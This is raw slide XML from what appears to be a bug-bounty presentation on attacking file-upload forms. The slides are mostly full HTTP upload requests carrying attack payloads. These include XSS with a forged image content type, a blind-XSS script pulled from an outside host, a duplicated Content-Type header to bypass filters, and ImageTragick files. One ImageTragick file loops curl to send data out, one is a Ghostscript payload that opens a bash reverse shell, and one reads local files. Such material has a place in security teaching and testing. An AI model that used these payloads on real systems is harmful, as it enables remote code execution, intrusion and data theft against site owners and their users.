Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1404367003914321920" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31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s://twitter.com/0xAwali" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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hyperlink" Target="https://portswigger.net/knowledgebase/papers/huntingasynchronousvulnerabilities.pdf" TargetMode="External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hyperlink" Target="https://bugreader.com/updatelap@local-file-inclusion-in-peeringgooglecom-70" TargetMode="External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hyperlink" Target="https://jspin.re/fileupload-blind-sqli/" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d" TargetMode="External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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="58375"/>
            <a:ext cx="4093800" cy="5084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0" name="Google Shape;200;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731825" y="112700"/>
            <a:ext cx="880200" cy="870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01" name="Google Shape;201;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="132782"/>
            <a:ext cx="195600" cy="206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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150"/>
            <a:ext cx="50301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b="1" lang="en">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Mahmoud M.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Awali</a:t>
            </a:r>
            <a:b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     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black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@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1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03" name="Google Shape;203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61200" y="4110576"/>
            <a:ext cx="727375" cy="56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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584900" y="2761813"/>
            <a:ext cx="3916500" cy="5115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                 Upload File From Your Computer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05" name="Google Shape;205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53575" y="2868050"/>
            <a:ext cx="381574" cy="2990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6" name="Google Shape;206;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868050" y="339175"/>
            <a:ext cx="5350200" cy="23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675">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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F i l e Upload</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="0B5394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9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Put File Name To e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.''gif</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Content Of The File </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert('XSS ');&lt;/script&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With Content Type</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> image/png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get XSS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312" name="Google Shape;312;p49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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.''gif</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png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GIF8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&lt;html&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;&lt;/html&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p49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14" name="Google Shape;314;p49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9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316" name="Google Shape;31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49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18" name="Google Shape;318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025" y="2675525"/>
            <a:ext cx="4210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0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Insert Large String 50.000+ Characters </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Numbers</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> As File Name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324" name="Google Shape;324;p50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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxxxx+.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Google Shape;325;p50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26" name="Google Shape;326;p50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50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328" name="Google Shape;32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025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50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1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Insert Blind XSS In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Of The File e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;head&gt;&gt;&lt;script </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src=https://me.xss.ht&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get XSS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336" name="Google Shape;336;p51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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;head&gt;&gt;&lt;script src=https://me.xss.ht&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p51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38" name="Google Shape;338;p51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51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340" name="Google Shape;34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51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42" name="Google Shape;342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025" y="2675525"/>
            <a:ext cx="4210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51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44" name="Google Shape;344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025" y="3067788"/>
            <a:ext cx="4210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2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Insert XSS Payloads In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Of The File e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;&lt;head&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/head&gt;&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get XSS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350" name="Google Shape;350;p52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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/html</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;&lt;head&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert('XSS');&lt;/script&gt;&lt;/html&gt;&lt;/head&gt;&lt;/body&gt;&lt;/html&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p52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52" name="Google Shape;352;p52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52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354" name="Google Shape;35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025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52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3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Set Content-Type Twice , Once For Unallowed Type And Once For Allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> That Can Be Useful For Bypasses The Restriction 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362" name="Google Shape;362;p53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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text/html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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;&lt;head&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert('XSS');&lt;/script&gt;&lt;/html&gt;&lt;/head&gt;&lt;/body&gt;&lt;/html&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;p53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64" name="Google Shape;364;p53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53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366" name="Google Shape;36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53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68" name="Google Shape;368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4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Insert ImageTragick Commands In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With Extension 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e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gif</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mvg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  To Get RCE OR SSRF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374" name="Google Shape;374;p54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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: image/png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push graphic-context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viewbox 0 0 640 480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image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60for i in $(ls /) ; do curl "http://$i.me.com/" -d @- &gt; /dev/null; done`'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pop graphic-context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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375;p54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76" name="Google Shape;376;p54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54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378" name="Google Shape;37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54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80" name="Google Shape;380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025" y="2675525"/>
            <a:ext cx="4210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54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82" name="Google Shape;382;p5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025" y="3544600"/>
            <a:ext cx="421000" cy="3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5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4025" y="39399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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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385" name="Google Shape;385;p54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86" name="Google Shape;386;p5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4025" y="3067788"/>
            <a:ext cx="4210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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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88" name="Google Shape;388;p5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64025" y="4335250"/>
            <a:ext cx="421000" cy="3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5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Insert ImageTragick Commands In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get RCE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394" name="Google Shape;394;p55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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST /fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: company.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundary</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Length: Number</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type: image/png</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%!PS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdict /setpagedevice undef</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>legal</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{ null restore } stopped { pop } if</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>legal</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mark /OutputFile (%pipe%bash -c 'bash -i &gt;&amp; /dev/tcp/IP-v4/8080 0&gt;&amp;1') currentdevice putdeviceprops</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p55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96" name="Google Shape;396;p55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55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398" name="Google Shape;39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025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55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401" name="Google Shape;401;p55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02" name="Google Shape;402;p5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025" y="3091500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55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04" name="Google Shape;404;p5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4025" y="3544600"/>
            <a:ext cx="421000" cy="3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6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Insert ImageTragick Commands In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Read Local Files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410" name="Google Shape;410;p56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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
